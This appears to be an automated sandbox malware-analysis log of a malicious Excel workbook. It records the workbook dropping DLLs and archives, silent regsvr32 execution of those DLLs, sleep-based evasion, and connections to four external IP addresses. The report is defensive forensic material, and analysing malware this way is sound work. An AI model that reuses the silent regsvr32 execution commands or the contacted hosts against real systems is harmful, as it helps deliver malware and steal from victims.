Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\alajwj.dll
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\luwbghnz.dll
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zdkvrlsh.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zaviwlej.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\alajwj.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\luwbghnz.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: printouts of outstanding as of 01_20_2021.xlsmInitial sample: OLE zip file path = xl/media/image2.png
Source: printouts of outstanding as of 01_20_2021.xlsmInitial sample: OLE zip file path = xl/media/image3.png
Source: printouts of outstanding as of 01_20_2021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: printouts of outstanding as of 01_20_2021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: printouts of outstanding as of 01_20_2021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: printouts of outstanding as of 01_20_2021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: printouts of outstanding as of 01_20_2021.xlsmInitial sample: OLE indicators vbamacros = False
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\by9zwa7p1[1].zipJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\ylztwx[1].rarJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\zsijkwsd.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\ogsit.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\xkpffwn[1].zipJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\zlgzuxvz.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\h79fwesfe[1].rarJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\h79fwesfe[1].rarJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\xkpffwn[1].zipJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\ylztwx[1].rarJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\by9zwa7p1[1].zipJump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\by9zwa7p1[1].zipJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\ylztwx[1].rarJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\xkpffwn[1].zipJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\h79fwesfe[1].rarJump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key enumerated: More than 564 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep count: 55 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2488Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -372000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -130000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -170000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -297000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -153000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -495000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -246000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -123000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -312000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -121000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -247000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -158000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -155000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -356000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -334000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -146000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -138000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -353000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -296000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -341000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -151000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -164000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -357000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -169000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -147000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -328000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -134000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -162000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -345000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244Thread sleep time: -132000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep count: 55 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2812Thread sleep time: -960000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -166000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -130000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -132000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -310000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -143000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -178000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -155000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -253000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -316000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -164000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -312000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -125000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -128000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -167000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -278000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -270000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -291000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -150000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -161000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -151000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -252000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -173000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -138000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -146000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816Thread sleep time: -293000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep count: 55 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1440Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep time: -290000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep time: -135000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep time: -174000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep time: -359000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep time: -175000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep time: -130000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep time: -314000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep time: -272000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep time: -142000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep time: -159000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep time: -328000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep time: -132000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep time: -140000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep time: -330000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep time: -166000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep time: -144000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep time: -282000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep time: -179000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep time: -146000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep time: -131000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep time: -353000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep time: -147000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep time: -163000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036Thread sleep time: -123000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052Thread sleep count: 55 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1340Thread sleep time: -1080000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052Thread sleep time: -124000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052Thread sleep time: -159000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052Thread sleep time: -167000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052Thread sleep time: -291000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052Thread sleep time: -130000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052Thread sleep time: -262000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052Thread sleep time: -332000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052Thread sleep time: -280000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052Thread sleep time: -150000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052Thread sleep time: -163000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052Thread sleep time: -309000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052Thread sleep time: -160000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052Thread sleep time: -147000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052Thread sleep time: -351000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052Thread sleep time: -151000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052Thread sleep time: -168000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052Thread sleep time: -258000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052Thread sleep time: -139000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052Thread sleep time: -161000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052Thread sleep time: -170000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052Thread sleep time: -129000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1340Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972Thread sleep count: 55 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2016Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972Thread sleep time: -165000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972Thread sleep time: -133000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972Thread sleep time: -149000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972Thread sleep time: -256000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972Thread sleep time: -143000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972Thread sleep time: -128000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972Thread sleep time: -129000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972Thread sleep time: -299000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972Thread sleep time: -167000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972Thread sleep time: -158000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972Thread sleep time: -174000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944Thread sleep count: 55 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2788Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944Thread sleep time: -156000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944Thread sleep time: -140000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944Thread sleep time: -122000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944Thread sleep time: -350000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944Thread sleep time: -145000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944Thread sleep time: -144000s >= -30000s

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 198.57.200.100 202
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 69.164.207.140 60
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 211.110.44.63 233
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 194.225.58.214 187
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
